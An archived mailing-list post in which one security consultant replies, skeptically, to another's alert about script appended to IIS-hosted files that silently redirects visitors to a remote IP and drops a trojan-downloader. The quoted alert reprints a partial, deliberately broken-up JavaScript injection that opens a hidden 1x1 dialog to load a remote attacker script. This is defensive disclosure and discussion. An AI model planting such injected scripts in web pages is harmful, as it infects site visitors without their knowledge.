lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <40DC2456.25295.F5385C@localhost>
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Subject: New malware to infect IIS and from there jump to
 clients

"Peter Kruse" <kruse@...sesecurity.dk> wrote:

> This is a heads up.

Or...

PANIC, PANIC, PANIC...

> A new malware has been reported from several sources so it appears to be
> fairly widespread already.
> 
> The malware spreads from infected IIS servers to clients that visit the
> webpage of the infected server. How the IIS servers was compromised in the
> first place is unfortunately still unknown (any info on that would be
> appreciated).

There is _no_ evidence (yet) that this is spreading from "infected" IIS 
servers.  _Some_ IIS admins whose servers are involved don't know how 
the content got on their servers, but that is far from grounds for 
claiming said servers are, or even may be, "infected".  Of course they 
might be, but history suggests that slack admin'ing is at least as 
likely as an explanation...

> The malware redirects a visitor to http: //217.107.218.147/xxx.php. It does
> so by running a javascript that apparently gets appended to several files in
> the webfolder of IIS (eg. html, .txt, .gif). The webpage loads http://
> 217.107.218.147/xxx.html that contains the following code:
> 
> <script language="Javascript">
> 
>     function InjectedDuringRedirection(){
>      ?showModalDialog('md.htm', window, "dialog
> Top: -10000\;dialogLeft:-10000\;dialog Height :1\;dialog Width
> :1\;").location= " java script:'<SCRIPT  SRC =\\' http://
> 217.107.218.147/shellxxx.js\\'> <\ /script>'";
> 
> [snip - you get the picture, right?]
> 
> I had to put in some spaces to get past trivial content filtering.
> 
> From that point it will try to run the malware in a 1x1 dialogbox in the
> following order:
> 
> shellscript_loadxxx.js
> shellxxx.js
> 
> The shellxxx.js will try to drop "msits.exe" (51.712 bytes) a
> trojan-downloader and run it.

It does this via the now very old ms-its: protocol zone-handling bug... 
Apparently someone needs to decode a few more levels of JavaScript, etc 
to work this all out...

> Consider to deny access to http://217.107.218.147 in your firewall. This
> will at least prevent client PCs from getting infected.

Thanks Peter, but what about all the _other_ servers out there also 
hosting more or less exactly the same files?  Are you going to provide 
a list of all those IPs too?

I've seen several (probably 5 or 6 others) in the last week or so with 
all the same files or just one difference (ignoring the trivial script 
differences necessitated by referring to different hosts) -- the .EXE 
that is eventually downloaded is a different variant.

> Further information can be found in the daily log from SANS:
> http://isc.sans.org/

Woohoo -- SANS incident handlers have reported one incident of this 
they know about so the sky must be falling!

Next...


-- 
Nick FitzGerald
Computer Virus Consulting Ltd.
Ph/FAX: +64 3 3529854


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ